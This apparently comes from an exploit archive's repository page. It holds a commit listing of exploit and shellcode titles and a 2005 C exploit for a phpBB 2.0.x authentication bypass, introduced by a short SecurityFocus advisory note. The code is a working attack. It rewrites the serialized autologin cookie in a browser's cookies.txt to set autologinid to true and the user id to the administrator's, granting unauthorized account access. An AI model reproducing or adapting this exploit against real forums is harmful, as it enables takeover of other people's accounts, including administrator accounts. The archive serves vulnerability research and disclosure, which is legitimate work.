880bbe402e
14991 changes to exploits/shellcodes HTC Touch - vCard over IP Denial of Service TeamSpeak 3.0.0-beta25 - Multiple Vulnerabilities PeerBlock 1.1 - Blue Screen of Death WS10 Data Server - SCADA Overflow (PoC) Symantec Endpoint Protection 12.1.4013 - Service Disabling Memcached 1.4.33 - 'Crash' (PoC) Memcached 1.4.33 - 'Add' (PoC) Memcached 1.4.33 - 'sasl' (PoC) Memcached 1.4.33 - 'Crash' (PoC) Memcached 1.4.33 - 'Add' (PoC) Memcached 1.4.33 - 'sasl' (PoC) Alcatel-Lucent (Nokia) GPON I-240W-Q - Buffer Overflow man-db 2.4.1 - 'open_cat_stream()' Local uid=man CDRecord's ReadCD - '$RSH exec()' SUID Shell Creation CDRecord's ReadCD - Local Privilege Escalation Anyburn 4.3 x86 - 'Copy disc to image file' Buffer Overflow (Unicode) (SEH) FreeBSD - Intel SYSRET Privilege Escalation (Metasploit) CCProxy 6.2 - 'ping' Remote Buffer Overflow Savant Web Server 3.1 - Remote Buffer Overflow (2) Litespeed Web Server 4.0.17 with PHP (FreeBSD) - Remote Overflow Alcatel-Lucent (Nokia) GPON I-240W-Q - Buffer Overflow QNAP TS-431 QTS < 4.2.2 - Remote Command Execution (Metasploit) Imperva SecureSphere 13.x - 'PWS' Command Injection (Metasploit) Drupal < 8.5.11 / < 8.6.10 - RESTful Web Services unserialize() Remote Command Execution (Metasploit) Oracle Weblogic Server - Deserialization Remote Command Execution (Patch Bypass) TeamCity < 9.0.2 - Disabled Registration Bypass OpenSSH SCP Client - Write Arbitrary Files Kados R10 GreenBee - Multiple SQL Injection WordPress Core 5.0 - Remote Code Execution phpBB 3.2.3 - Remote Code Execution Linux/x86 - Create File With Permission 7775 + exit() Shellcode (Generator) Linux/x86 - setreuid(0_0) + execve(/bin/ash_NULL_NULL) + XOR Encoded Shellcode (58 bytes) Linux/x86 - setreuid(0_0) + execve(_/bin/csh__ [/bin/csh_ NULL]) + XOR Encoded Shellcode (53 bytes) Linux/x86 - setreuid(0_0) + execve(_/bin/ksh__ [/bin/ksh_ NULL]) + XOR Encoded Shellcode (53 bytes) Linux/x86 - setreuid(0_0) + execve(_/bin/zsh__ [/bin/zsh_ NULL]) + XOR Encoded Shellcode (53 bytes) Linux/x86 - setreuid(0_0) + execve(/bin/ash_NULL_NULL) + XOR Encoded Shellcode (58 bytes) Linux/x86 - setreuid(0_0) + execve(_/bin/csh__ [/bin/csh_ NULL]) + XOR Encoded Shellcode (53 bytes) Linux/x86 - setreuid(0_0) + execve(_/bin/ksh__ [/bin/ksh_ NULL]) + XOR Encoded Shellcode (53 bytes) Linux/x86 - setreuid(0_0) + execve(_/bin/zsh__ [/bin/zsh_ NULL]) + XOR Encoded Shellcode (53 bytes)
95 lines
No EOL
2.5 KiB
C
95 lines
No EOL
2.5 KiB
C
// source: https://www.securityfocus.com/bid/12678/info
|
|
|
|
phpBB is affected by an authentication bypass vulnerability.
|
|
|
|
This issue is due to the application failing to properly sanitize user-supplied input during authentication.
|
|
|
|
Exploitation of this vulnerability would permit unauthorized access to any known account including the administrator account.
|
|
|
|
The vendor has addressed this issue in phpBB 2.0.13.
|
|
|
|
/*
|
|
Author: Paisterist
|
|
Date: 28-02-05
|
|
[N]eo [S]ecurity [T]eam ©
|
|
|
|
Description: this exploit modify the user id that is in your
|
|
cookies.txt (Firefox and Mozilla) file.
|
|
You have to log in the forum, with the autologin option unchecked,
|
|
then you close the navigator and
|
|
execute the exploit.
|
|
If you have any problem with the exploit, remove all cookies and do all
|
|
again.
|
|
|
|
Note: you have to put the exploit in the same directory of cookies.txt.
|
|
This exploit overwrite all phpbb cookies that have the user id
|
|
specified.
|
|
|
|
I HAVE NOT DISCOVERED THIS VULNERABILITY, I DON'T KNOW WHO HAS
|
|
DISCOVERED IT.
|
|
|
|
By Paisterist
|
|
|
|
http://neosecurityteam.net
|
|
http://neosecurityteam.tk
|
|
|
|
Greetz: Hackzatan, Crashcool, Towner, Daemon21, Wokkko, Maxx,
|
|
Arcanhell, Alluz.
|
|
*/
|
|
#include <stdio.h>
|
|
#include <stdlib.h>
|
|
#include <string.h>
|
|
|
|
int main(int argc, char** argv[]) {
|
|
FILE *pointer;
|
|
char contenido[10000],
|
|
|
|
cookie[91]="a%3A2%3A%7Bs%3A11%3A%22autologinid%22%3Bs%3A0
|
|
%3A%22%22%3Bs%3A6%3A%22userid%22%3Bs%3A1%3A%22",
|
|
cookief[9]="%22%3B%7D", cookiec[106],
|
|
|
|
cookie_false[92]="a%3A2%3A%7Bs%3A11%3A%22autologinid%22%3Bb
|
|
%3A1%3Bs%3A6%3A%22userid%22%3Bs%3A1%3A%222%22%3B%7D",
|
|
*pos;
|
|
int p=0, i=0;
|
|
|
|
if (argc!=2) {
|
|
printf("Usage: phpbb_exploit.exe user_id\n\n");
|
|
exit(0);
|
|
}
|
|
pointer=fopen("cookies.txt", "r");
|
|
|
|
if (pointer) {
|
|
fread(contenido, 300, 10, pointer);
|
|
fclose(pointer);
|
|
} else {
|
|
printf("The file can't be open\n");
|
|
exit(0);
|
|
}
|
|
|
|
strcpy(cookiec, cookie);
|
|
strncat(cookiec, argv[1], 6);
|
|
strcat(cookiec, cookief);
|
|
|
|
if (pos=strstr(contenido, cookiec)) {
|
|
p=pos - contenido;
|
|
while (i<92) {
|
|
if (cookie_false[i]!=NULL)
|
|
contenido[p]=cookie_false[i];
|
|
p++;
|
|
i++;
|
|
}
|
|
}
|
|
else {
|
|
printf("The file cookies.txt isn't valid for execute the
|
|
exploit or the user id is incorrect\n");
|
|
exit(0);
|
|
}
|
|
|
|
if (pointer=fopen("cookies.txt", "w")) {
|
|
fputs(contenido, pointer);
|
|
printf("Cookie modified: \n\n%s\n\n", contenido);
|
|
printf("The cookies file has overwriten... looks like the exploit has worked");
|
|
} else printf("\n\nThe file cookies.txt has not write permissions.");
|
|
return 0;
|
|
} |